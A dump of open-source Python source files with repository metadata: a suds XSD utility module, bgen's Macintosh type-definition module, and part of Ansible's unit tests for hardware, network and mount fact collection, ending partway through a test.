# This program is free software; you can redistribute it and/or modify # it under the terms of the (LGPL) GNU Lesser General Public License as # published by the Free Software Foundation; either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Library Lesser General Public License for more details at # ( http://www.gnu.org/licenses/lgpl.html ). # # You should have received a copy of the GNU Lesser General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. # written by: Jeff Ortel ( jortel@redhat.com ) from suds import * from suds.sax import Namespace, splitPrefix def qualify(ref, resolvers, defns=Namespace.default): """ Get a reference that is I{qualified} by namespace. @param ref: A referenced schema type name. @type ref: str @param resolvers: A list of objects to be used to resolve types. @type resolvers: [L{sax.element.Element},] @param defns: An optional target namespace used to qualify references when no prefix is specified. @type defns: A default namespace I{tuple: (prefix,uri)} used when ref not prefixed. @return: A qualified reference. @rtype: (name, namespace-uri) """ ns = None p, n = splitPrefix(ref) if p is not None: if not isinstance(resolvers, (list, tuple)): resolvers = (resolvers,) for r in resolvers: resolved = r.resolvePrefix(p) if resolved[1] is not None: ns = resolved break if ns is None: raise Exception('prefix (%s) not resolved' % p) else: ns = defns return (n, ns[1]) def isqref(object): """ Get whether the object is a I{qualified reference}. @param object: An object to be tested. 
@type object: I{any} @rtype: boolean @see: L{qualify} """ return (\ isinstance(object, tuple) and \ len(object) == 2 and \ isinstance(object[0], basestring) and \ isinstance(object[1], basestring)) class Filter: def __init__(self, inclusive=False, *items): self.inclusive = inclusive self.items = items def __contains__(self, x): if self.inclusive: result = ( x in self.items ) else: result = ( x not in self.items ) return result
lgpl-3.0
bob-the-hamster/commandergenius
project/jni/python/src/Tools/bgen/bgen/macsupport.py
48
7631
"""\ Augment the "bgen" package with definitions that are useful on the Apple Macintosh. Intended usage is "from macsupport import *" -- this implies all bgen's goodies. """ # Import everything from bgen (for ourselves as well as for re-export) from bgen import * # Simple types Boolean = Type("Boolean", "b") SignedByte = Type("SignedByte", "b") Size = Type("Size", "l") Style = Type("Style", "b") StyleParameter = Type("StyleParameter", "h") CharParameter = Type("CharParameter", "h") TextEncoding = Type("TextEncoding", "l") ByteCount = Type("ByteCount", "l") Duration = Type("Duration", "l") ByteOffset = Type("ByteOffset", "l") OptionBits = Type("OptionBits", "l") ItemCount = Type("ItemCount", "l") PBVersion = Type("PBVersion", "l") ScriptCode = Type("ScriptCode", "h") LangCode = Type("LangCode", "h") RegionCode = Type("RegionCode", "h") UInt8 = Type("UInt8", "b") SInt8 = Type("SInt8", "b") UInt16 = Type("UInt16", "H") SInt16 = Type("SInt16", "h") UInt32 = Type("UInt32", "l") SInt32 = Type("SInt32", "l") Float32 = Type("Float32", "f") wide = OpaqueByValueType("wide", "PyMac_Buildwide", "PyMac_Getwide") wide_ptr = OpaqueType("wide", "PyMac_Buildwide", "PyMac_Getwide") # Pascal strings ConstStr255Param = OpaqueArrayType("Str255", "PyMac_BuildStr255", "PyMac_GetStr255") Str255 = OpaqueArrayType("Str255", "PyMac_BuildStr255", "PyMac_GetStr255") StringPtr = OpaqueByValueType("StringPtr", "PyMac_BuildStr255", "PyMac_GetStr255") ConstStringPtr = StringPtr # File System Specifications FSSpec_ptr = OpaqueType("FSSpec", "PyMac_BuildFSSpec", "PyMac_GetFSSpec") FSSpec = OpaqueByValueStructType("FSSpec", "PyMac_BuildFSSpec", "PyMac_GetFSSpec") FSRef_ptr = OpaqueType("FSRef", "PyMac_BuildFSRef", "PyMac_GetFSRef") FSRef = OpaqueByValueStructType("FSRef", "PyMac_BuildFSRef", "PyMac_GetFSRef") # OSType and ResType: 4-byte character strings def OSTypeType(typename): return OpaqueByValueType(typename, "PyMac_BuildOSType", "PyMac_GetOSType") OSType = OSTypeType("OSType") ResType = 
OSTypeType("ResType") FourCharCode = OSTypeType("FourCharCode") # Version numbers NumVersion = OpaqueByValueType("NumVersion", "PyMac_BuildNumVersion", "BUG") # Handles (always resources in our case) Handle = OpaqueByValueType("Handle", "ResObj") MenuHandle = OpaqueByValueType("MenuHandle", "MenuObj") MenuRef = MenuHandle ControlHandle = OpaqueByValueType("ControlHandle", "CtlObj") ControlRef = ControlHandle # Windows and Dialogs WindowPtr = OpaqueByValueType("WindowPtr", "WinObj") WindowRef = WindowPtr DialogPtr = OpaqueByValueType("DialogPtr", "DlgObj") DialogRef = DialogPtr ExistingWindowPtr = OpaqueByValueType("WindowPtr", "WinObj_WhichWindow", "BUG") ExistingDialogPtr = OpaqueByValueType("DialogPtr", "DlgObj_WhichDialog", "BUG") # NULL pointer passed in as optional storage -- not present in Python version NullStorage = FakeType("(void *)0") # More standard datatypes Fixed = OpaqueByValueType("Fixed", "PyMac_BuildFixed", "PyMac_GetFixed") # Quickdraw data types Rect = Rect_ptr = OpaqueType("Rect", "PyMac_BuildRect", "PyMac_GetRect") Point = OpaqueByValueType("Point", "PyMac_BuildPoint", "PyMac_GetPoint") Point_ptr = OpaqueType("Point", "PyMac_BuildPoint", "PyMac_GetPoint") # Event records EventRecord = OpaqueType("EventRecord", "PyMac_BuildEventRecord", "PyMac_GetEventRecord") EventRecord_ptr = EventRecord # CoreFoundation datatypes CFTypeRef = OpaqueByValueType("CFTypeRef", "CFTypeRefObj") CFStringRef = OpaqueByValueType("CFStringRef", "CFStringRefObj") CFMutableStringRef = OpaqueByValueType("CFMutableStringRef", "CFMutableStringRefObj") CFArrayRef = OpaqueByValueType("CFArrayRef", "CFArrayRefObj") CFMutableArrayRef = OpaqueByValueType("CFMutableArrayRef", "CFMutableArrayRefObj") CFDictionaryRef = OpaqueByValueType("CFDictionaryRef", "CFDictionaryRefObj") CFMutableDictionaryRef = OpaqueByValueType("CFMutableDictionaryRef", "CFMutableDictionaryRefObj") CFURLRef = OpaqueByValueType("CFURLRef", "CFURLRefObj") OptionalCFURLRef = OpaqueByValueType("CFURLRef", 
"OptionalCFURLRefObj") # OSErr is special because it is turned into an exception # (Could do this with less code using a variant of mkvalue("O&")?) class OSErrType(Type): def errorCheck(self, name): Output("if (%s != noErr) return PyMac_Error(%s);", name, name) self.used = 1 OSErr = OSErrType("OSErr", 'h') OSStatus = OSErrType("OSStatus", 'l') # Various buffer types InBuffer = VarInputBufferType('char', 'long', 'l') # (buf, len) UcharInBuffer = VarInputBufferType('unsigned char', 'long', 'l') # (buf, len) OptionalInBuffer = OptionalVarInputBufferType('char', 'long', 'l') # (buf, len) InOutBuffer = HeapInputOutputBufferType('char', 'long', 'l') # (inbuf, outbuf, len) VarInOutBuffer = VarHeapInputOutputBufferType('char', 'long', 'l') # (inbuf, outbuf, &len) OutBuffer = HeapOutputBufferType('char', 'long', 'l') # (buf, len) VarOutBuffer = VarHeapOutputBufferType('char', 'long', 'l') # (buf, &len) VarVarOutBuffer = VarVarHeapOutputBufferType('char', 'long', 'l') # (buf, len, &len) # Unicode arguments sometimes have reversed len, buffer (don't understand why Apple did this...) 
class VarUnicodeInputBufferType(VarInputBufferType): def getargsFormat(self): return "u#" class VarUnicodeReverseInputBufferType(ReverseInputBufferMixin, VarUnicodeInputBufferType): pass UnicodeInBuffer = VarUnicodeInputBufferType('UniChar', 'UniCharCount', 'l') UnicodeReverseInBuffer = VarUnicodeReverseInputBufferType('UniChar', 'UniCharCount', 'l') UniChar_ptr = InputOnlyType("UniCharPtr", "u") # Predefine various pieces of program text to be passed to Module() later: # Stuff added immediately after the system include files includestuff = """ #include "pymactoolbox.h" /* Macro to test whether a weak-loaded CFM function exists */ #define PyMac_PRECHECK(rtn) do { if ( &rtn == NULL ) {\\ PyErr_SetString(PyExc_NotImplementedError, \\ "Not available in this shared library/OS version"); \\ return NULL; \\ }} while(0) """ # Stuff added just before the module's init function finalstuff = """ """ # Stuff added inside the module's init function initstuff = """ """ # Generator classes with a twist -- if the function returns OSErr, # its mode is manipulated so that it turns into an exception or disappears # (and its name is changed to _err, for documentation purposes). # This requires that the OSErr type (defined above) has a non-trivial # errorCheck method. 
class OSErrMixIn: "Mix-in class to treat OSErr/OSStatus return values special" def makereturnvar(self): if self.returntype.__class__ == OSErrType: return Variable(self.returntype, "_err", ErrorMode) else: return Variable(self.returntype, "_rv", OutMode) class OSErrFunctionGenerator(OSErrMixIn, FunctionGenerator): pass class OSErrMethodGenerator(OSErrMixIn, MethodGenerator): pass class WeakLinkMixIn: "Mix-in to test the function actually exists (!= NULL) before calling" def precheck(self): Output('#ifndef %s', self.name) Output('PyMac_PRECHECK(%s);', self.name) Output('#endif') class WeakLinkFunctionGenerator(WeakLinkMixIn, FunctionGenerator): pass class WeakLinkMethodGenerator(WeakLinkMixIn, MethodGenerator): pass class OSErrWeakLinkFunctionGenerator(OSErrMixIn, WeakLinkMixIn, FunctionGenerator): pass class OSErrWeakLinkMethodGenerator(OSErrMixIn, WeakLinkMixIn, MethodGenerator): pass class MacModule(Module): "Subclass which gets the exception initializer from macglue.c" def exceptionInitializer(self): return "PyMac_GetOSErrException()"
lgpl-2.1
dlazz/ansible
test/units/module_utils/facts/test_facts.py
45
22750
# This file is part of Ansible # -*- coding: utf-8 -*- # # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # # Make coding more python3-ish from __future__ import (absolute_import, division) __metaclass__ = type import os import pytest # for testing from units.compat import unittest from units.compat.mock import Mock, patch from ansible.module_utils import facts from ansible.module_utils.facts import hardware from ansible.module_utils.facts import network from ansible.module_utils.facts import virtual class BaseTestFactsPlatform(unittest.TestCase): platform_id = 'Generic' fact_class = hardware.base.Hardware collector_class = None """Verify that the automagic in Hardware.__new__ selects the right subclass.""" @patch('platform.system') def test_new(self, mock_platform): if not self.fact_class: pytest.skip('This platform (%s) does not have a fact_class.' % self.platform_id) mock_platform.return_value = self.platform_id inst = self.fact_class(module=Mock(), load_on_init=False) self.assertIsInstance(inst, self.fact_class) self.assertEqual(inst.platform, self.platform_id) def test_subclass(self): if not self.fact_class: pytest.skip('This platform (%s) does not have a fact_class.' 
% self.platform_id) # 'Generic' will try to map to platform.system() that we are not mocking here if self.platform_id == 'Generic': return inst = self.fact_class(module=Mock(), load_on_init=False) self.assertIsInstance(inst, self.fact_class) self.assertEqual(inst.platform, self.platform_id) def test_collector(self): if not self.collector_class: pytest.skip('This test class needs to be updated to specify collector_class') inst = self.collector_class() self.assertIsInstance(inst, self.collector_class) self.assertEqual(inst._platform, self.platform_id) class TestLinuxFactsPlatform(BaseTestFactsPlatform): platform_id = 'Linux' fact_class = hardware.linux.LinuxHardware collector_class = hardware.linux.LinuxHardwareCollector class TestHurdFactsPlatform(BaseTestFactsPlatform): platform_id = 'GNU' fact_class = hardware.hurd.HurdHardware collector_class = hardware.hurd.HurdHardwareCollector class TestSunOSHardware(BaseTestFactsPlatform): platform_id = 'SunOS' fact_class = hardware.sunos.SunOSHardware collector_class = hardware.sunos.SunOSHardwareCollector class TestOpenBSDHardware(BaseTestFactsPlatform): platform_id = 'OpenBSD' fact_class = hardware.openbsd.OpenBSDHardware collector_class = hardware.openbsd.OpenBSDHardwareCollector class TestFreeBSDHardware(BaseTestFactsPlatform): platform_id = 'FreeBSD' fact_class = hardware.freebsd.FreeBSDHardware collector_class = hardware.freebsd.FreeBSDHardwareCollector class TestDragonFlyHardware(BaseTestFactsPlatform): platform_id = 'DragonFly' fact_class = None collector_class = hardware.dragonfly.DragonFlyHardwareCollector class TestNetBSDHardware(BaseTestFactsPlatform): platform_id = 'NetBSD' fact_class = hardware.netbsd.NetBSDHardware collector_class = hardware.netbsd.NetBSDHardwareCollector class TestAIXHardware(BaseTestFactsPlatform): platform_id = 'AIX' fact_class = hardware.aix.AIXHardware collector_class = hardware.aix.AIXHardwareCollector class TestHPUXHardware(BaseTestFactsPlatform): platform_id = 'HP-UX' fact_class = 
hardware.hpux.HPUXHardware collector_class = hardware.hpux.HPUXHardwareCollector class TestDarwinHardware(BaseTestFactsPlatform): platform_id = 'Darwin' fact_class = hardware.darwin.DarwinHardware collector_class = hardware.darwin.DarwinHardwareCollector class TestGenericNetwork(BaseTestFactsPlatform): platform_id = 'Generic' fact_class = network.base.Network class TestHurdPfinetNetwork(BaseTestFactsPlatform): platform_id = 'GNU' fact_class = network.hurd.HurdPfinetNetwork collector_class = network.hurd.HurdNetworkCollector class TestLinuxNetwork(BaseTestFactsPlatform): platform_id = 'Linux' fact_class = network.linux.LinuxNetwork collector_class = network.linux.LinuxNetworkCollector class TestGenericBsdIfconfigNetwork(BaseTestFactsPlatform): platform_id = 'Generic_BSD_Ifconfig' fact_class = network.generic_bsd.GenericBsdIfconfigNetwork collector_class = None class TestHPUXNetwork(BaseTestFactsPlatform): platform_id = 'HP-UX' fact_class = network.hpux.HPUXNetwork collector_class = network.hpux.HPUXNetworkCollector class TestDarwinNetwork(BaseTestFactsPlatform): platform_id = 'Darwin' fact_class = network.darwin.DarwinNetwork collector_class = network.darwin.DarwinNetworkCollector class TestFreeBSDNetwork(BaseTestFactsPlatform): platform_id = 'FreeBSD' fact_class = network.freebsd.FreeBSDNetwork collector_class = network.freebsd.FreeBSDNetworkCollector class TestDragonFlyNetwork(BaseTestFactsPlatform): platform_id = 'DragonFly' fact_class = network.dragonfly.DragonFlyNetwork collector_class = network.dragonfly.DragonFlyNetworkCollector class TestAIXNetwork(BaseTestFactsPlatform): platform_id = 'AIX' fact_class = network.aix.AIXNetwork collector_class = network.aix.AIXNetworkCollector class TestNetBSDNetwork(BaseTestFactsPlatform): platform_id = 'NetBSD' fact_class = network.netbsd.NetBSDNetwork collector_class = network.netbsd.NetBSDNetworkCollector class TestOpenBSDNetwork(BaseTestFactsPlatform): platform_id = 'OpenBSD' fact_class = network.openbsd.OpenBSDNetwork 
collector_class = network.openbsd.OpenBSDNetworkCollector class TestSunOSNetwork(BaseTestFactsPlatform): platform_id = 'SunOS' fact_class = network.sunos.SunOSNetwork collector_class = network.sunos.SunOSNetworkCollector class TestLinuxVirtual(BaseTestFactsPlatform): platform_id = 'Linux' fact_class = virtual.linux.LinuxVirtual collector_class = virtual.linux.LinuxVirtualCollector class TestFreeBSDVirtual(BaseTestFactsPlatform): platform_id = 'FreeBSD' fact_class = virtual.freebsd.FreeBSDVirtual collector_class = virtual.freebsd.FreeBSDVirtualCollector class TestNetBSDVirtual(BaseTestFactsPlatform): platform_id = 'NetBSD' fact_class = virtual.netbsd.NetBSDVirtual collector_class = virtual.netbsd.NetBSDVirtualCollector class TestOpenBSDVirtual(BaseTestFactsPlatform): platform_id = 'OpenBSD' fact_class = virtual.openbsd.OpenBSDVirtual collector_class = virtual.openbsd.OpenBSDVirtualCollector class TestHPUXVirtual(BaseTestFactsPlatform): platform_id = 'HP-UX' fact_class = virtual.hpux.HPUXVirtual collector_class = virtual.hpux.HPUXVirtualCollector class TestSunOSVirtual(BaseTestFactsPlatform): platform_id = 'SunOS' fact_class = virtual.sunos.SunOSVirtual collector_class = virtual.sunos.SunOSVirtualCollector LSBLK_OUTPUT = b""" /dev/sda /dev/sda1 32caaec3-ef40-4691-a3b6-438c3f9bc1c0 /dev/sda2 66Ojcd-ULtu-1cZa-Tywo-mx0d-RF4O-ysA9jK /dev/mapper/fedora_dhcp129--186-swap eae6059d-2fbe-4d1c-920d-a80bbeb1ac6d /dev/mapper/fedora_dhcp129--186-root d34cf5e3-3449-4a6c-8179-a1feb2bca6ce /dev/mapper/fedora_dhcp129--186-home 2d3e4853-fa69-4ccf-8a6a-77b05ab0a42d /dev/sr0 /dev/loop0 0f031512-ab15-497d-9abd-3a512b4a9390 /dev/loop1 7c1b0f30-cf34-459f-9a70-2612f82b870a /dev/loop9 0f031512-ab15-497d-9abd-3a512b4a9390 /dev/loop9 7c1b4444-cf34-459f-9a70-2612f82b870a /dev/mapper/docker-253:1-1050967-pool /dev/loop2 /dev/mapper/docker-253:1-1050967-pool """ LSBLK_OUTPUT_2 = b""" /dev/sda /dev/sda1 32caaec3-ef40-4691-a3b6-438c3f9bc1c0 /dev/sda2 66Ojcd-ULtu-1cZa-Tywo-mx0d-RF4O-ysA9jK 
/dev/mapper/fedora_dhcp129--186-swap eae6059d-2fbe-4d1c-920d-a80bbeb1ac6d /dev/mapper/fedora_dhcp129--186-root d34cf5e3-3449-4a6c-8179-a1feb2bca6ce /dev/mapper/fedora_dhcp129--186-home 2d3e4853-fa69-4ccf-8a6a-77b05ab0a42d /dev/mapper/an-example-mapper with a space in the name 84639acb-013f-4d2f-9392-526a572b4373 /dev/sr0 /dev/loop0 0f031512-ab15-497d-9abd-3a512b4a9390 """ LSBLK_UUIDS = {'/dev/sda1': '66Ojcd-ULtu-1cZa-Tywo-mx0d-RF4O-ysA9jK'} UDEVADM_UUID = 'N/A' MTAB = """ sysfs /sys sysfs rw,seclabel,nosuid,nodev,noexec,relatime 0 0 proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0 devtmpfs /dev devtmpfs rw,seclabel,nosuid,size=8044400k,nr_inodes=2011100,mode=755 0 0 securityfs /sys/kernel/security securityfs rw,nosuid,nodev,noexec,relatime 0 0 tmpfs /dev/shm tmpfs rw,seclabel,nosuid,nodev 0 0 devpts /dev/pts devpts rw,seclabel,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0 tmpfs /run tmpfs rw,seclabel,nosuid,nodev,mode=755 0 0 tmpfs /sys/fs/cgroup tmpfs ro,seclabel,nosuid,nodev,noexec,mode=755 0 0 cgroup /sys/fs/cgroup/systemd cgroup rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd 0 0 pstore /sys/fs/pstore pstore rw,seclabel,nosuid,nodev,noexec,relatime 0 0 cgroup /sys/fs/cgroup/devices cgroup rw,nosuid,nodev,noexec,relatime,devices 0 0 cgroup /sys/fs/cgroup/freezer cgroup rw,nosuid,nodev,noexec,relatime,freezer 0 0 cgroup /sys/fs/cgroup/memory cgroup rw,nosuid,nodev,noexec,relatime,memory 0 0 cgroup /sys/fs/cgroup/pids cgroup rw,nosuid,nodev,noexec,relatime,pids 0 0 cgroup /sys/fs/cgroup/blkio cgroup rw,nosuid,nodev,noexec,relatime,blkio 0 0 cgroup /sys/fs/cgroup/cpuset cgroup rw,nosuid,nodev,noexec,relatime,cpuset 0 0 cgroup /sys/fs/cgroup/cpu,cpuacct cgroup rw,nosuid,nodev,noexec,relatime,cpu,cpuacct 0 0 cgroup /sys/fs/cgroup/hugetlb cgroup rw,nosuid,nodev,noexec,relatime,hugetlb 0 0 cgroup /sys/fs/cgroup/perf_event cgroup rw,nosuid,nodev,noexec,relatime,perf_event 0 0 cgroup 
/sys/fs/cgroup/net_cls,net_prio cgroup rw,nosuid,nodev,noexec,relatime,net_cls,net_prio 0 0 configfs /sys/kernel/config configfs rw,relatime 0 0 /dev/mapper/fedora_dhcp129--186-root / ext4 rw,seclabel,relatime,data=ordered 0 0 selinuxfs /sys/fs/selinux selinuxfs rw,relatime 0 0 systemd-1 /proc/sys/fs/binfmt_misc autofs rw,relatime,fd=24,pgrp=1,timeout=0,minproto=5,maxproto=5,direct 0 0 debugfs /sys/kernel/debug debugfs rw,seclabel,relatime 0 0 hugetlbfs /dev/hugepages hugetlbfs rw,seclabel,relatime 0 0 tmpfs /tmp tmpfs rw,seclabel 0 0 mqueue /dev/mqueue mqueue rw,seclabel,relatime 0 0 /dev/loop0 /var/lib/machines btrfs rw,seclabel,relatime,space_cache,subvolid=5,subvol=/ 0 0 /dev/sda1 /boot ext4 rw,seclabel,relatime,data=ordered 0 0 /dev/mapper/fedora_dhcp129--186-home /home ext4 rw,seclabel,relatime,data=ordered 0 0 tmpfs /run/user/1000 tmpfs rw,seclabel,nosuid,nodev,relatime,size=1611044k,mode=700,uid=1000,gid=1000 0 0 gvfsd-fuse /run/user/1000/gvfs fuse.gvfsd-fuse rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0 fusectl /sys/fs/fuse/connections fusectl rw,relatime 0 0 grimlock.g.a: /home/adrian/sshfs-grimlock fuse.sshfs rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0 grimlock.g.a:test_path/path_with'single_quotes /home/adrian/sshfs-grimlock-single-quote fuse.sshfs rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0 grimlock.g.a:path_with'single_quotes /home/adrian/sshfs-grimlock-single-quote-2 fuse.sshfs rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0 grimlock.g.a:/mnt/data/foto's /home/adrian/fotos fuse.sshfs rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0 """ MTAB_ENTRIES = [ [ 'sysfs', '/sys', 'sysfs', 'rw,seclabel,nosuid,nodev,noexec,relatime', '0', '0' ], ['proc', '/proc', 'proc', 'rw,nosuid,nodev,noexec,relatime', '0', '0'], [ 'devtmpfs', '/dev', 'devtmpfs', 'rw,seclabel,nosuid,size=8044400k,nr_inodes=2011100,mode=755', '0', '0' ], [ 'securityfs', '/sys/kernel/security', 'securityfs', 'rw,nosuid,nodev,noexec,relatime', 
'0', '0' ], ['tmpfs', '/dev/shm', 'tmpfs', 'rw,seclabel,nosuid,nodev', '0', '0'], [ 'devpts', '/dev/pts', 'devpts', 'rw,seclabel,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000', '0', '0' ], ['tmpfs', '/run', 'tmpfs', 'rw,seclabel,nosuid,nodev,mode=755', '0', '0'], [ 'tmpfs', '/sys/fs/cgroup', 'tmpfs', 'ro,seclabel,nosuid,nodev,noexec,mode=755', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/systemd', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd', '0', '0' ], [ 'pstore', '/sys/fs/pstore', 'pstore', 'rw,seclabel,nosuid,nodev,noexec,relatime', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/devices', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,devices', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/freezer', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,freezer', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/memory', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,memory', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/pids', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,pids', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/blkio', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,blkio', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/cpuset', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,cpuset', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/cpu,cpuacct', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,cpu,cpuacct', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/hugetlb', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,hugetlb', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/perf_event', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,perf_event', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/net_cls,net_prio', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,net_cls,net_prio', '0', '0' ], ['configfs', '/sys/kernel/config', 'configfs', 'rw,relatime', '0', '0'], [ '/dev/mapper/fedora_dhcp129--186-root', '/', 'ext4', 'rw,seclabel,relatime,data=ordered', '0', '0' ], ['selinuxfs', '/sys/fs/selinux', 'selinuxfs', 'rw,relatime', '0', '0'], [ 'systemd-1', '/proc/sys/fs/binfmt_misc', 'autofs', 
'rw,relatime,fd=24,pgrp=1,timeout=0,minproto=5,maxproto=5,direct', '0', '0' ], ['debugfs', '/sys/kernel/debug', 'debugfs', 'rw,seclabel,relatime', '0', '0'], [ 'hugetlbfs', '/dev/hugepages', 'hugetlbfs', 'rw,seclabel,relatime', '0', '0' ], ['tmpfs', '/tmp', 'tmpfs', 'rw,seclabel', '0', '0'], ['mqueue', '/dev/mqueue', 'mqueue', 'rw,seclabel,relatime', '0', '0'], [ '/dev/loop0', '/var/lib/machines', 'btrfs', 'rw,seclabel,relatime,space_cache,subvolid=5,subvol=/', '0', '0' ], ['/dev/sda1', '/boot', 'ext4', 'rw,seclabel,relatime,data=ordered', '0', '0'], # A 'none' fstype ['/dev/sdz3', '/not/a/real/device', 'none', 'rw,seclabel,relatime,data=ordered', '0', '0'], # lets assume this is a bindmount ['/dev/sdz4', '/not/a/real/bind_mount', 'ext4', 'rw,seclabel,relatime,data=ordered', '0', '0'], [ '/dev/mapper/fedora_dhcp129--186-home', '/home', 'ext4', 'rw,seclabel,relatime,data=ordered', '0', '0' ], [ 'tmpfs', '/run/user/1000', 'tmpfs', 'rw,seclabel,nosuid,nodev,relatime,size=1611044k,mode=700,uid=1000,gid=1000', '0', '0' ], [ 'gvfsd-fuse', '/run/user/1000/gvfs', 'fuse.gvfsd-fuse', 'rw,nosuid,nodev,relatime,user_id=1000,group_id=1000', '0', '0' ], ['fusectl', '/sys/fs/fuse/connections', 'fusectl', 'rw,relatime', '0', '0']] BIND_MOUNTS = ['/not/a/real/bind_mount'] with open(os.path.join(os.path.dirname(__file__), 'fixtures/findmount_output.txt')) as f: FINDMNT_OUTPUT = f.read() class TestFactsLinuxHardwareGetMountFacts(unittest.TestCase): # FIXME: mock.patch instead def setUp(self): # The @timeout tracebacks if there isn't a GATHER_TIMEOUT is None (the default until get_all_facts sets it via global) facts.GATHER_TIMEOUT = 10 def tearDown(self): facts.GATHER_TIMEOUT = None # The Hardware subclasses freakout if instaniated directly, so # mock platform.system and inst Hardware() so we get a LinuxHardware() # we can test. 
@patch('ansible.module_utils.facts.hardware.linux.LinuxHardware._mtab_entries', return_value=MTAB_ENTRIES) @patch('ansible.module_utils.facts.hardware.linux.LinuxHardware._find_bind_mounts', return_value=BIND_MOUNTS) @patch('ansible.module_utils.facts.hardware.linux.LinuxHardware._lsblk_uuid', return_value=LSBLK_UUIDS) @patch('ansible.module_utils.facts.hardware.linux.LinuxHardware._udevadm_uuid', return_value=UDEVADM_UUID) def test_get_mount_facts(self, mock_lsblk_uuid, mock_find_bind_mounts, mock_mtab_entries, mock_udevadm_uuid): module = Mock() # Returns a LinuxHardware-ish lh = hardware.linux.LinuxHardware(module=module, load_on_init=False) # Nothing returned, just self.facts modified as a side effect mount_facts = lh.get_mount_facts() self.assertIsInstance(mount_facts, dict) self.assertIn('mounts', mount_facts) self.assertIsInstance(mount_facts['mounts'], list) self.assertIsInstance(mount_facts['mounts'][0], dict) @patch('ansible.module_utils.facts.hardware.linux.get_file_content', return_value=MTAB) def test_get_mtab_entries(self, mock_get_file_content): module = Mock() lh = hardware.linux.LinuxHardware(module=module, load_on_init=False) mtab_entries = lh._mtab_entries() self.assertIsInstance(mtab_entries, list) self.assertIsInstance(mtab_entries[0], list) self.assertEqual(len(mtab_entries), 38) @patch('ansible.module_utils.facts.hardware.linux.LinuxHardware._run_findmnt', return_value=(0, FINDMNT_OUTPUT, '')) def test_find_bind_mounts(self, mock_run_findmnt): module = Mock() lh = hardware.linux.LinuxHardware(module=module, load_on_init=False) bind_mounts = lh._find_bind_mounts() # If bind_mounts becomes another seq type, feel free to change self.assertIsInstance(bind_mounts, set) self.assertEqual(len(bind_mounts), 1) self.assertIn('/not/a/real/bind_mount', bind_mounts) @patch('ansible.module_utils.facts.hardware.linux.LinuxHardware._run_findmnt', return_value=(37, '', '')) def test_find_bind_mounts_non_zero(self, mock_run_findmnt): module = Mock() lh = 
hardware.linux.LinuxHardware(module=module, load_on_init=False) bind_mounts = lh._find_bind_mounts() self.assertIsInstance(bind_mounts, set) self.assertEqual(len(bind_mounts), 0) def test_find_bind_mounts_no_findmnts(self): module = Mock() module.get_bin_path = Mock(return_value=None) lh = hardware.linux.LinuxHardware(module=module, load_on_init=False) bind_mounts = lh._find_bind_mounts() self.assertIsInstance(bind_mounts, set) self.assertEqual(len(bind_mounts), 0) @patch('ansible.module_utils.facts.hardware.linux.LinuxHardware._run_lsblk', return_value=(0, LSBLK_OUTPUT, '')) def test_lsblk_uuid(self, mock_run_lsblk): module = Mock() lh = hardware.linux.LinuxHardware(module=module, load_on_init=False) lsblk_uuids = lh._lsblk_uuid() self.assertIsInstance(lsblk_uuids, dict) self.assertIn(b'/dev/loop9', lsblk_uuids) self.assertIn(b'/dev/sda1', lsblk_uuids) self.assertEqual(lsblk_uuids[b'/dev/sda1'], b'32caaec3-ef40-4691-a3b6-438c3f9bc1c0') @patch('ansible.module_utils.facts.hardware.linux.LinuxHardware._run_lsblk', return_value=(37, LSBLK_OUTPUT, '')) def test_lsblk_uuid_non_zero(self, mock_run_lsblk): module = Mock() lh = hardware.linux.LinuxHardware(module=module, load_on_init=False) lsblk_uuids = lh._lsblk_uuid() self.assertIsInstance(lsblk_uuids, dict) self.assertEqual(len(lsblk_uuids), 0) def test_lsblk_uuid_no_lsblk(self): module = Mock() module.get_bin_path = Mock(return_value=None) lh = hardware.linux.LinuxHardware(module=module, load_on_init=False) lsblk_uuids = lh._lsblk_uuid() self.assertIsInstance(lsblk_uuids, dict) self.assertEqual(len(lsblk_uuids), 0) @patch('ansible.module_utils.facts.hardware.linux.LinuxHardware._run_lsblk', return_value=(0, LSBLK_OUTPUT_2, '')) def test_lsblk_uuid_dev_with_space_in_name(self, mock_run_lsblk): module = 